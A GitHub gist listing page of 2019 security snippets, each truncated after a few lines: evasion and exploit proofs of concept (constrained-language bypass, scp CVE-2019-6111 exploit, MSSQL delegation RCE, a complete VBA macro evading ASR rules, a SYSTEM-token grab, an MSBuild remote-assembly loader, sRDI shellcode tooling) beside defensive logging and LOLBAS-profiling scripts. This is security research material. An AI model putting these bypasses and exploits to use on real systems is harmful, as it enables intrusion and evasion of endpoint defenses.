sasqwatch
/ ExtractDriversFromAuditLogs.ps1
Created
January 22, 2019 18:41
— forked from mattifestation/ExtractDriversFromAuditLogs.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create a temp dir in which to copy the drivers to whitelist | |
| mkdir ScanMe | |
| Get-WinEvent -LogName 'Microsoft-Windows-CodeIntegrity/Operational' -FilterXPath '*[System[EventID=3076]]' | ForEach-Object { | |
| $DriverPath = $_.Properties[1].Value | |
| # Normalize the paths | |
| switch -Wildcard ($DriverPath) { | |
| '\Device\HarddiskVolume4\*' { $DriverPath = "C:\$($DriverPath.Replace('\Device\HarddiskVolume4\', ''))" } | |
| 'System32*' { $DriverPath = "C:\Windows\$DriverPath" } |
sasqwatch
/ RunscripthelperBypass.ps1
Created
January 22, 2019 18:41
— forked from mattifestation/RunscripthelperBypass.ps1
PowerShell weaponization for the runscripthelper.exe constrained language mode bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-RunScriptHelperExpression { | |
| <# | |
| .SYNOPSIS | |
| Executes PowerShell code in full language mode in the context of runscripthelper.exe. | |
| .DESCRIPTION | |
| Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode. |
sasqwatch
/ sshtranger_things.py
Created
January 23, 2019 19:20
— forked from mehaase/sshtranger_things.py
SSHtranger Things Exploit POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Title: SSHtranger Things | |
| Author: Mark E. Haase <[email protected]> | |
| Homepage: https://www.hyperiongray.com | |
| Date: 2019-01-17 | |
| CVE: CVE-2019-6111, CVE-2019-6110 | |
| Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt | |
| Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 | |
| We have nicknamed this "SSHtranger Things" because the bug is so old it could be |
sasqwatch
/ bad_sequel.py
Created
January 29, 2019 00:47
— forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a rough PoC | |
| # requirements for RCE: | |
| # - the attacker needs to either have or create an object with a service principal name | |
| # - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
| # - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
| # - NTLM has to be in use |
sasqwatch
/ ASR Rules Bypass.vba
Created
January 30, 2019 21:35
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
sasqwatch
/ getsystem_parent.cpp
Created
January 30, 2019 22:08
— forked from xpn/getsystem_parent.cpp
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) { | |
| TOKEN_PRIVILEGES tp; | |
| LUID luid; | |
| TOKEN_PRIVILEGES tpPrevious; | |
| DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); | |
| if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; |
sasqwatch
/ process_image_logging.ps1
Created
January 31, 2019 20:35
— forked from mattifestation/process_image_logging.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process | |
| $WINEVENT_KEYWORD_PROCESS = 0x10 | |
| $WINEVENT_KEYWORD_IMAGE = 0x40 | |
| # Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy. | |
| # I'm going to limit collection to only image and process event | |
| $KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic' | |
| $KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE) | |
| $KernelProcessLog.ProviderLevel = 0xFF | |
| $KernelProcessLog.IsEnabled = $true |
sasqwatch
/ msBuildDemo.xml
Created
January 31, 2019 23:52
— forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="DemoClass"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> |
sasqwatch
/ ShellcodeRDI.go
Created
February 13, 2019 09:27
— forked from leoloobeek/ShellcodeRDI.go
Go implementation of https://github.com/monoxgas/sRDI/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| * | |
| * This is just a Go implementation of https://github.com/monoxgas/sRDI/ | |
| * Useful if you're trying to generate shellcode for reflective DLL | |
| * injection in Go, otherwise probably not much use :) | |
| * | |
| * The project, shellcode, most comments within this project | |
| * are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas) |
sasqwatch
/ sysmon_lolbas_profiler.ps1
Created
February 13, 2019 09:31
— forked from leoloobeek/sysmon_lolbas_profiler.ps1
Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #https://github.com/LOLBAS-Project/LOLBAS | |
| $lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdep |